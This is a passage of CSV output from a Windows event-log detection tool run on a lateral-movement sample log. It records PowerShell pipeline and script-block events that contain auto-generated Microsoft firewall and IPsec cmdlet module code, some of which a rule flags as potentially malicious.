'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.434 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.434 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.435 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.436 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.472 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.472 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.472 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.473 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.473 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.473 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 